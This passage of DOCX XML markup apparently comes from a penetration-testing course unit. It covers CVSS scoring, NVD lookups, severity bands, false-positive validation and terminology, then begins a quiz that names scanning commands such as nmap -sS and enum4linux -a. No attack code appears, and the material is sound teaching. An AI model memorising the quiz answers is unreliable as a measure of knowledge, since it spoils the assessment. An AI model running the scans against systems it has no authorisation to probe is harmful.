          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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Scope (S)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="750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Whether the vulnerability can affect resources beyond its own security scope: Unchanged or Changed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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C / I / A Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="750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Separate Confidentiality, Integrity and Availability impact ratings (None/Low/High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">These metrics combine into a base score from 0.0 to 10.0, shown alongside every finding on both Nessus and the National Vulnerability Database (nvd.nist.gov).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.16 CVE Lookup on nvd.nist.gov</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">National Vulnerability Database (NVD)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the authoritative, freely searchable source of CVE records. A typical workflow: take a CVE ID or a product/version from a scan finding, search it on nvd.nist.gov, and review the description, the CVSS vector string, the affected version range, and any linked public exploit code. This confirms a finding is accurately scoped before it goes into a final report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdynw0xkz_dtbz8gs8z59ls">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">National Vulnerability Database (NVD) — nvd.nist.gov</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdyu_dihvxnogewuwgtabe4">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">FIRST — Common Vulnerability Scoring System (CVSS) v3.1 Specification</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.17 Differentiating Severity Levels</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1754"/>
        <w:gridCol w:w="2242"/>
        <w:gridCol w:w="5750"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1754"/>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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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CVSS v3.1 Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="575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Typical Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1754"/>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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="224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9.0 – 10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="575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Remediate immediately — often remotely exploitable with no authentication needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1754"/>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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="224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7.0 – 8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="575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Prioritise in the current patch cycle; significant impact or fairly easy exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1754"/>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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="224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4.0 – 6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="575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Schedule remediation; usually needs specific conditions or has limited impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1754"/>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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="224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0.1 – 3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5750"/>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Track and fix opportunistically; minimal standalone impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1754"/>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Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="224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0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5750"/>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No direct risk on its own, but useful context (e.g. banner disclosure)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.18 False Positives and Validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">false positive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a finding the scanner reports that does not actually exist or cannot be exploited on the real target — for example, a banner-based version match against a product whose vendor backported a security fix without changing the version number. Common causes: version-string spoofing, WAFs altering responses, outdated scanner plugin logic.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:left w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:bottom w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:right w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E7B45"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⚑ Defensive Measures</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Every critical or high finding should be </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">manually verified</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> — by banner grabbing, changelog review, or a safe manual test — before it is included in a final report. Reporting unverified findings wastes the client's remediation effort and damages the report's credibility.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Passive recon (OSINT, WHOIS, DNS, Shodan, theHarvester, Maltego, LinkedIn, Recon-ng) gathers information without touching the target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Active recon (Nmap scan types, NSE, banner grabbing) and enumeration (SMB, SNMP, SMTP, NetBIOS) directly probe the target and can be logged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS v3.1 breaks severity into six metrics (AV, AC, PR, UI, S, C/I/A) combining into a 0–10 base score.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">nvd.nist.gov is the authoritative source for CVE details and CVSS vectors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A high CVSS score is not automatically top priority — exploitability, exposure and business impact must also be weighed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">False positives must be manually validated before inclusion in a report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Important Definitions &amp; Terminology</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2437"/>
        <w:gridCol w:w="7309"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7309"/>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Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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OSINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="730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Open-Source Intelligence — information gathered from publicly available sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Zone transfer (AXFR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7309"/>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 DNS mechanism to replicate zone data between servers; if misconfigured, leaks the whole DNS zone to anyone who asks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Banner grabbing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="730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Connecting to a service to read its self-reported version/greeting string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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NSE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7309"/>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Nmap Scripting Engine — a Lua-based framework for automated service/vulnerability checks within Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="730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Common Vulnerability Scoring System — a standard formula for scoring vulnerability severity from 0 to 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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False positive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7309"/>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 scanner finding that does not reflect a real, exploitable weakness on the actual target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple-Choice Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which of these is an example of passive reconnaissance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> against the target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Looking up the target's domain on Shodan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Connecting with Netcat to grab a banner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">enum4linux -a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> against a host</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which Nmap scan completes the full TCP three-way handshake?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -sS (SYN scan)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
